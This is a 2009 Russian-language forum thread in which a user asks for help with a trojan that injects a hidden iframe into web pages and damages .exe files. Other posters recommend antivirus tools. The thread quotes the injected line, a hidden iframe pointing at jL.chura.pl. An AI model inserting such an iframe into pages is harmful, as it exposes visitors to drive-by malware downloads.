Справочник функций

Ваш аккаунт

Войти через: 
Забыли пароль?
Регистрация
Информацию о новых материалах можно получать и без регистрации:

Почтовая рассылка

Подписчиков: -1
Последний выпуск: 19.06.2015

jl.chura.pl

976
13 июля 2009 года
mikhalych
198 / / 04.01.2009
Как избавитьса я от такой заразы. Кто нибудь сталкивался ?
Троян постоянно во все сайты которые я открываю даже на локалке без инета когда работаю с Апач в каждую открываемую мною страницу добавляет вот такой скрипт.

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

И далее постановка всем известная: то есть с этим iframe вызывает какую то страницу и от туда качает свое гав№

Кроме этого также разрушает все .exe файлы.
Помогите пожалуйста весь инет расшарил. Пока мало кто знаком с этой эпидемией.:eek:

OS: WinXP SP2
Antivirus: NOD32 4.0.24
22K
13 июля 2009 года
kotelius
75 / / 08.08.2008
Всем привет!

А ты не пробывал CureIt от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.

P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D
92
13 июля 2009 года
Тень Пса
2.2K / / 19.10.2006
http://virusinfo.info/showthread.php?t=43822

а вот Аваст Хоум Эдишн помог не одному челу =0)
http://download.cnet.com/3001-20_4-10019223.html?spi=4dbf5a7a962839f84995d1ff0cbbd71c

вот прям против этого виря от АВГ
http://www.avg.com/us.virus-removal.ndi-67762
976
13 июля 2009 года
mikhalych
198 / / 04.01.2009
Цитата: Тень Пса
http://virusinfo.info/showthread.php?t=43822

а вот Аваст Хоум Эдишн помог не одному челу =0)
http://download.cnet.com/3001-20_4-10019223.html?spi=4dbf5a7a962839f84995d1ff0cbbd71c

вот прям против этого виря от АВГ
http://www.avg.com/us.virus-removal.ndi-67762



Значит можно смело предположить что сам Аваст и мог замутить такую шнягу:D

976
13 июля 2009 года
mikhalych
198 / / 04.01.2009
Цитата: kotelius
Всем привет!

А ты не пробывал CureIt от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.

P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D



По ходу моего расследования я наткнулся на странные сервисы в моем винде их перечисляю.
ld12.exe
DPCs.exe
А как можно узнать кто запустил процесс ? ProcessExplorer ом можно ?

22K
14 июля 2009 года
kotelius
75 / / 08.08.2008
Цитата: mikhalych
По ходу моего расследования я наткнулся на странные сервисы в моем винде их перечисляю.
ld12.exe
DPCs.exe
А как можно узнать кто запустил процесс ? ProcessExplorer ом можно ?



Да, ProcessExplorer'ом можно узнать, там когда наводишь мышку на процесс, то всплывает подсказка в которой и указан путь к файлу, который запустил процесс.
Также в некоторых firewall'ax есть типа вкладка активные процессы, и там тоже можно проследить.
У меня стоит Outpost Firewall Pro, так я там такие вещи смотрю.

22K
14 июля 2009 года
kotelius
75 / / 08.08.2008
Цитата: mikhalych

ld12.exe
DPCs.exe



DPCs.exe - это Deferred Procedure Calls. Вобщем, за это не переживай, оно нужно (http://ru.wikipedia.org/wiki/DPC)

976
17 июля 2009 года
mikhalych
198 / / 04.01.2009
Короче говоря ниче нисмог сделать с заразой.
Пришлось по ламерски снести винду.
1
17 июля 2009 года
kot_
7.3K / / 20.01.2000
Цитата: mikhalych

OS: WinXP SP2


йопт. Ты добрая душа - можешь смело просить у сообщества медаль - типа "Почетный спамбот" :)

63
18 июля 2009 года
Zorkus
2.6K / / 04.11.2006
Цитата: kotelius
Всем привет!

А ты не пробывал от Dr.Web'a?
Я раньше частенько им много гадости с компа удалял.
Также посмотри по процессам, что лишнее грохай по очереди и смотри появляется эта шняга или нет. Если найдешь процесс, можно тогда найти кто его запускает, и потом уже грохать вирусняк.
По поводу CureIt: скачай его с не инфицированного компа и закатай на болванку.

P.S. Если, ничего не поможет, то грохай винду (шутка) :D
P.P.S. А в каждой шутке есть доля правды :D


Насчет CureIt - хороший совет.

Пытаться удалить вирус (хороший, годный вирус) с компа голыми руками, отслеживая процессы в виндовом таскменеджере? Ну удачи и земля вам пухом, но советы такие давать не стоит людям, которые хотят вылечить вирус. Да и потом - что значит - грохать вирус?Ты думаешь, в таск менеджере есть процесс, называющийся так же как и вирус, и который достаточно прибить, чтобы вирус исчез;)

Сносить винду -- самое последнее средство. Самое.

92
18 июля 2009 года
Тень Пса
2.2K / / 19.10.2006
Цитата: mikhalych
Короче говоря ниче нисмог сделать с заразой.
Пришлось по ламерски снести винду.


не понял... дал тебе ссылки на действующие средства против этого виря. а ты снес винду... мде.

товарищ у меня попробовал (тож такое словил), вылечил.

1
18 июля 2009 года
kot_
7.3K / / 20.01.2000
ну а что ты хочешь от человека у которого установлен второй сервис-пак? Это говорит что вопросы безопасности ему не просто паралельны - а даже рядом не стояли. Мало того что использует винду ...
22K
20 июля 2009 года
kotelius
75 / / 08.08.2008
Цитата: Zorkus

Пытаться удалить вирус (хороший, годный вирус) с компа голыми руками, отслеживая процессы в виндовом таскменеджере? Ну удачи и земля вам пухом, но советы такие давать не стоит людям, которые хотят вылечить вирус. Да и потом - что значит - грохать вирус?Ты думаешь, в таск менеджере есть процесс, называющийся так же как и вирус, и который достаточно прибить, чтобы вирус исчез;)

Сносить винду -- самое последнее средство. Самое.



Всем привет!

Zorkus, ну во-первых, я не говорил, что есть процесс с таким же названием как вирус. Я просто имел ввиду, что возможно какой-то процесс был запущен вирусняком, и грохать я говорил не вирус, а процессы левые (не системные), и то по очереди, и после каждого грохнутого процесса проверять воспроизводится ли эта проблема. Это обыкновенный анализ, в следствии которого можно найти процесс, запущенный вирусняком. Повторюсь, вирусняки не всегда запускают процессы в ТМ, соответственно это всего лишь один из вариантов поиска виря. И если есть такой процес, то в ProcessExplorer можно посмотреть какой файл его запустил.
Что касается переустановки винды, то там же написано, что это шутка! Хотя многие так и делают, когда уже нету сил гонять вирусняк.

262
24 июля 2009 года
Iktomy
1.2K / / 11.10.2004
Я в таких случаях иду на Вируслист и ищу способ лечения. Шо вы прям так радикально - сносить систему. Это не наш метод.

Знаете кого-то, кто может ответить? Поделитесь с ним ссылкой.

Ваш ответ

Реклама на сайте | Обмен ссылками | Ссылки | Экспорт (RSS) | Контакты
Добавить статью | Добавить исходник | Добавить хостинг-провайдера | Добавить сайт в каталог